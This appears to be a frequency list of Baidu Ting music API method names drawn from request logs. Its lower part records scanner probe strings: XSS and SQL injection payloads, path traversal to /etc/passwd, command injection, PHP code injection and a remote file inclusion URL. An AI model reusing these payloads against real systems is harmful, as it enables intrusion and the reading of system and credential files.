baidu.ting.song.getInfos	77236775
baidu.ting.search.lrcpic	31911262
baidu.ting.song.baseInfo	28408148
baidu.ting.search.catalogSug	24904661
baidu.ting.user.listenAge	22969807
baidu.ting.song.play	22055481
baidu.ting.search.common	20710341
baidu.ting.song.down	10652677
baidu.ting.song.lry	9866319
baidu.ting.user.getUserBaseInfo	9276658
baidu.ting.outerPassport.profile	8854912
baidu.ting.artist.getSongList	7273172
baidu.ting.favorite.isCollect	6826965
baidu.ting.artist.getList	6032032
baidu.ting.billboard.billList	5656060
ting.baidu.diy.getPlaylists	5644941
baidu.ting.song.getInfo	4855017
baidu.ting.search.lrcys	4612395
baidu.ting.user.config	4473059
baidu.ting.search.getPhotoInfos	4443132
baidu.ting.game.gamedetail	3865123
baidu.ting.plaza.getRecommendAlbum	3445505
baidu.ting.artist.getInfo	3317922
baidu.ting.user.checkComVersion	3215200
baidu.ting.active.start	3054236
baidu.ting.plaza.active	3034212
baidu.ting.radio.playAction	2871699
baidu.ting.diy.gedanInfo	2774535
	2550313
baidu.ting.plaza.getFocusPic	2414951
baidu.ting.user.getMessage	2373252
baidu.ting.user.checkSuggestVersion	2098665
baidu.ting.artist.getinfo	1802792
baidu.ting.search.suggestion	1727034
baidu.ting.diy.gedanHot	1664121
baidu.ting.vip.checkVIPPromotion	1602410
baidu.ting.search.lrcyss	1589127
baidu.ting.plaza.recdaily	1477059
baidu.ting.album.getAlbumInfo	1379940
baidu.ting.radio.getChannelSong	1320238
baidu.ting.diy.addListenCount	1246835
baidu.ting.diy.category	1218650
ting.baidu.plaza.recdaily	1183747
baidu.ting.favorite.getCollectSong	1137834
baidu.ting.artist.getAlbumList	1122990
baidu.ting.user.down	1000432
baidu.ting.feedback.song	924780
baidu.ting.plaza.getPartDesc	922144
baidu.ting.user.registToUC	885497
baidu.ting.diy.gedan	811293
baidu.ting.tag.songlist	785625
baidu.ting.song.buffer	779721
baidu.ting.tag.getHotTag	704112
baidu.ting.diy.getNowOfficalList	651263
baidu.ting.user.RegistToImsg	639986
baidu.ting.song.audio	589297
baidu.ting.diy.getSongFromOfficalList	551149
baidu.ting.billboard.billCategory	503494
baidu.ting.radio.getCategoryList	490619
baidu.ting.diy.getPlaylists	400117
baidu.ting.game.gamelist	327259
baidu.ting.search.getPhotoInfo	321540
baidu.ting.song.getMulInfos	253460
baidu.ting.plaza.recommend	232365
baidu.ting.artist.get72HotArtist	226906
baidu.ting.favorite.addSongFavorites	199896
baidu.ting.favorite.getFavoriteSong	197856
baidu.ting.mv.getIndexMV	145948
baidu.ting.favorite.addSongFavorite	138764
baidu.ting.diy.search	134042
baidu.ting.tag.getAllTag	123582
baidu.ting.video.getList	117328
baidu.ting.video.play	96301
baidu.ting.diy.getSimilarGedan	92613
baidu.ting.diy.getOfficialDiyList	86630
baidu.ting.mv.playMV	74584
baidu.ting.favorite.delCollectSong	67160
baidu.ting.user.nplogin	53967
baidu.ting.plaza.getNewSongs	46334
baidu.ting.user.checkVersion	42287
ting.baidu.diy.getPlaylist	41932
baidu.ting.artist.getSpecialSongList	41695
baidu.ting.cloud.checkFile	34718
baidu.ting.radio.getArtistChannelSong	34687
baidu.ting.cloud.record	34341
baidu.ting.radio.getFavoriteSong	32792
baidu.ting.mv.searchMV	29171
baidu.ting.plaza.getArtistPlaza	23984
baidu.ting.diy.getPlaylist	21628
baidu.ting.song.getPic	19232
baidu.ting.diy.saveList	18228
baidu.ting.feedback.crash	17225
baidu.ting.radio.serv	17136
baidu.ting.artist.getHighSongTitle	14873
baidu.ting.album.getList	11708
baidu.ting.song.cloud	11355
baidu.ting.favorite.delSongFavorite	10492
ting.baidu.film.getFilmInfo	10085
baidu.ting.cloud.signature	9758
baidu.ting.video.category	9651
baidu.ting.artist.getQianQianArtist	7875
baidu.ting.diy.addListSong	7492
baidu.ting.song.getMulInfo	7362
baidu.ting.weixin.response	7013
baidu.ting.diy.delListSong	6931
ting.baidu.song.lry	6835
baidu.ting.diy.delList	6321
baidu.ting.billboard.catalog	5509
baidu.ting.mv.getMultiSongMVInfo	4853
baidu.ting.colorRing.listen	4799
baidu.ting.user.logout	4661
baidu.ting.artist.getHighSongList	4183
baidu.ting.user.regPassport	3878
baidu.ting.colorRing.getCode	3315
baidu.ting.colorRing.authset	3278
ting.baidu.search.lrcpic	3037
baidu.ting.user.getMobileVcode	2893
baidu.ting.favorite.delSongFavorites	2701
ting.baidu.artistapp.renum	2621
baidu.ting.mv.getMVCategory	2616
ting.baidu.search.common	2522
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.favorite.getFavoriteAlbum	1722
baidu.ting.cloud.expand	1435
baidu.ting.favorite.getListenHistory	1268
baidu.ting.artist.getSongRank	1264
ting.baidu.billboard.billlist	1229
baidu.ting.artist.getSong	1205
baidu.ting.diy.addList	1108
baidu.ting.artist.getInfoList	897
ting.baidu.artistapp.brief	853
baidu.ting.diy.upList	766
baidu.ting.favorite.getOffenListenList	764
baidu.ting.feedback.info	738
ting.baidu.song.baseInfo	648
ting.baidu.billboard.billCategory	632
ting.baidu.song.play	627
ting.baidu.song.down	622
ting.baidu.song.getinfos	606
ting.baidu.diy.gedanhot	601
ting.baidu.diy.gedan	600
ting.baidu.diy.gedaninfo	593
ting.baidu.song.cloud	592
baidu.ting.video.recMv	576
baidu.ting.colorRing.toneset	439
baidu.ting.song.getSuoSongInfo	368
baidu.ting.artist.getInfoByName	362
baidu.ting.user.activate	330
baidu.ting.artistapp.photo	303
ting.baidu.plaza.getFocusPic	288
baidu.ting.favorite.getInfoFromView	272
baidu.ting.colorRing.subscribe	264
baidu.ting.user.login	192
ting.baidu.artistapp.newList	139
ting.baidu.artistapp.news	118
baidu.ting.favorite.addAlbumFavorite	109
baidu.ting.song.getHash	70
baidu.ting.user.addPassportInfo	59
ting.baidu.artistapp.briefs	54
baidu.ting.plaza.getMisNewSong	40
baidu.ting.favorite.delAlbumFavorite	39
baidu.ting.song.playAAC	36
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	30
baidu.ting.album.getAlbumstyle	15
baidu.ting.game.catalog	7
\' (	6
(	6
ting.baidu.artistapp.send	5
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	4
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.favorite.getFavoriteSongCount	3
http://cirt.lnet/rfiinc.txt_	2
file:///etc/passwd_	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	2
/usr/bin/id;	2
../../../../../../../../../../etc/rc.d/rc.local_	2
../../../../../../../../../../etc/rc.d/rc.local	2
http://cirt.lnet/rfiinc.txt	2
../../../../../../../../../../etc/passwd_	2
${@print(md5(812812))}	2
../../../../../../../../../../etc/passwd	2
ting.baidu.diy.addPlaylist	2
c:/windows/win.ini_.jpg	2
data://text/plain;base64,dGVzdA==_.php	2
file:///etc/rc.d/rc.local_	2
c:/windows/win.ini	2
c:/windows/win.ini_	2
data://text/plain;base64,dGVzdA==_	2
baidu.ting.song.play\';alert(1);\'	2
http://10.42.7.217/?1388943913.41	2
http://10.42.7.217/?1388943876.18	2
data://text/plain;base64,dGVzdA==	2
1\\\";cat /etc/rc.d/rc.local;\\\"	2
file:///etc/rc.d/rc.local	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	2
ting.baidu.diy.rmPlaylist	2
file:///etc/passwd	2
string:{var_dump(md5(812812))}	2
1;cat /etc/rc.d/rc.local;	2
%{	2
${	2
\'];${@print(md5(812812))};//	2
set	2
1\';cat /etc/rc.d/rc.local;\'	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.play</textarea></title><script>alert(1)</script>	1
baidu.ting.song.play--></script><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.play</script><script>alert(1);//	1
baidu.ting.song.play<script>confirm(1)</script>	1
baidu.ting.song.play\') and 8288=8288 and (\'	1
../../../../../../../../../../etc/passwd_.php	1
../../../../../../../../../../etc/passwd_.jpg	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
baidu.ting.song.playjavascript:alert(1)	1
baidu.ting.song.play\'\";alert(1);//	1
baidu.ting.song.getI.fos	1
baidu.ting.song.play\";alert(1);\"	1
http://cirt.lnet/rfiinc.txt_.php	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.song.play;alert(1);//	1
file:///etc/rc.d/rc.local_.jpeg	1
baidu.ting.song.lry;alert(1);//	1
file:///etc/rc.d/rc.local_.htm	1
file:///etc/passwd_.jpeg	1
file:///etc/passwd_.php	1
